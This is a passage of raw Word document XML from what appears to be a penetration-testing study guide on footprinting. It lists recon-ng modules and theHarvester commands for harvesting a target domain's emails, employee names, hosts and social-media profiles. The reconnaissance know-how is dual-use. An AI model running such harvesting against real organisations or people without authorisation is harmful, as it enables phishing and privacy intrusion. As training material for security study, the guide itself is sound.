              </w:rPr>
              <w:t xml:space="preserve">set FILENAME </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/root/Desktop/FILE/html</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Where to save and the new file name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741F9824" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">options </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">CREATOR </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:t>Option to set a named creator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4FAFCC" w14:textId="2B601425" w:rsidR="00822805" w:rsidRPr="00832D17" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">options </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USTOMER</w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0022620C">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009D1CFC">
              <w:t>Option to set a customer/client name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00822805" w14:paraId="053DDC02" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="766DFDD1" w14:textId="50A4708B" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t>13.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="74AF2F49" w14:textId="77777777" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BF7C92C" w14:textId="6F4FADEE" w:rsidR="00822805" w:rsidRPr="0093071A" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Here are some more useful modules to load within </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>recon-ng</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>recon/domains-contacts/whois_pocs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:t>Th</w:t>
            </w:r>
            <w:r>
              <w:t>e above</w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:t xml:space="preserve"> module uses the ARIN Whois RWS to harvest POC data from Whois </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:tab/>
              <w:t>queries for the given domain.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>recon/profiles-profiles/namechk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446E550A" w14:textId="61273499" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">The above </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:t>module validates the username existence of a specified contact.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E92124" w14:textId="5291AF6B" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">modules </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">load </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>recon/profiles-profiles/profiler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A038653" w14:textId="421AB4B1" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:t xml:space="preserve">The above module finds </w:t>
            </w:r>
            <w:r w:rsidRPr="0093071A">
              <w:t>the existence of user-profiles on various websites</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB6072A" w14:textId="43296371" w:rsidR="00822805" w:rsidRDefault="00822805" w:rsidP="00716493">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">options </w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>set SOURCE</w:t>
            </w:r>
            <w:r w:rsidRPr="00327DAF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> facebook.com</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>If a module requires a source, provide a site such as facebook.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000079AE" w14:paraId="51DF5E16" w14:textId="77777777" w:rsidTr="00832D17">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="11B32093" w14:textId="77777777" w:rsidR="000079AE" w:rsidRDefault="000079AE" w:rsidP="00716493"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1FF568E4" w14:textId="77777777" w:rsidR="000079AE" w:rsidRDefault="000079AE" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7699" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24C5C33A" w14:textId="77777777" w:rsidR="000079AE" w:rsidRDefault="000079AE" w:rsidP="00716493"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10EDAE1E" w14:textId="77777777" w:rsidR="00FA2601" w:rsidRDefault="00FA2601"/>
    <w:p w14:paraId="21D312EB" w14:textId="6F0A72AF" w:rsidR="00F60139" w:rsidRDefault="00FA2601" w:rsidP="00F60139">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00F60139">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r w:rsidR="00F60139">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | emt</w:t>
      </w:r>
      <w:r w:rsidR="00D21B87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00D21B87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> eMailTrackerPro</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00826793" w14:paraId="7B335537" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3E755ED3" w14:textId="3E20BA29" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="003E65E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37C3AB3B" w14:textId="21FD32E6" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>theHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="688CC375" w14:textId="07293C1E" w:rsidR="00826793" w:rsidRPr="000079AE" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:r w:rsidRPr="00F60139">
              <w:t>This tool gathers emails, subdomains, hosts, employee names, open ports, and banners from different public sources such as search engines, PGP key servers, and the SHODAN computer database as well as uses Google, Bing, SHODAN, etc. to extract valuable information from the target domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00826793" w14:paraId="66813075" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7B590687" w14:textId="7A570780" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="003E65E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="215C6A72" w14:textId="77777777" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1801D3B3" w14:textId="65767C4D" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>The command to open theHarvester is just that:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>theHarvester</w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00413616">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>eccouncil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-b</w:t>
            </w:r>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00423552">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>baidu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="716C6590" w14:textId="213ACC62" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:t>Domain/company name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:t>limit the number of results</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:t>Search for virtual hosts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-b </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ABC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:t>Specify a source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-s</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Use Shodan to query discovered hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00826793" w14:paraId="67057F77" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4BA31E74" w14:textId="6CE38952" w:rsidR="00826793" w:rsidRDefault="00D21B87" w:rsidP="00716493">
            <w:r>
              <w:t>14.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4BD4250D" w14:textId="77777777" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="249E468E" w14:textId="0C16C39C" w:rsidR="00826793" w:rsidRDefault="00826793" w:rsidP="00826793">
            <w:r>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00826793">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-h </w:t>
            </w:r>
            <w:r>
              <w:t>to see a list of the different sources that the tool can use to run its search function.</w:t>
            </w:r>
            <w:r w:rsidR="00413616">
              <w:t xml:space="preserve"> You can use </w:t>
            </w:r>
            <w:r w:rsidR="00413616" w:rsidRPr="00413616">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-b</w:t>
            </w:r>
            <w:r w:rsidR="00413616">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00413616" w:rsidRPr="00413616">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>linkedin</w:t>
            </w:r>
            <w:r w:rsidR="00413616">
              <w:t xml:space="preserve"> to query that social media site.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21B87" w14:paraId="4E35D33E" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="719E0A62" w14:textId="1872B3D9" w:rsidR="00D21B87" w:rsidRDefault="00D21B87" w:rsidP="00D21B87">
            <w:r>
              <w:t>14.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="570133E8" w14:textId="6B2CB9F3" w:rsidR="00D21B87" w:rsidRDefault="00D21B87" w:rsidP="00D21B87">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>emt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6431311B" w14:textId="2DE67CB7" w:rsidR="00D21B87" w:rsidRDefault="00D21B87" w:rsidP="00D21B87">
            <w:r>
              <w:t xml:space="preserve">eMailTrackerPro, currently, is only available on Windows systems and is a paid-for-service with a 15 day trail period to use the software with the entirety of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>it’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B23AE6" w14:paraId="2D370E27" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
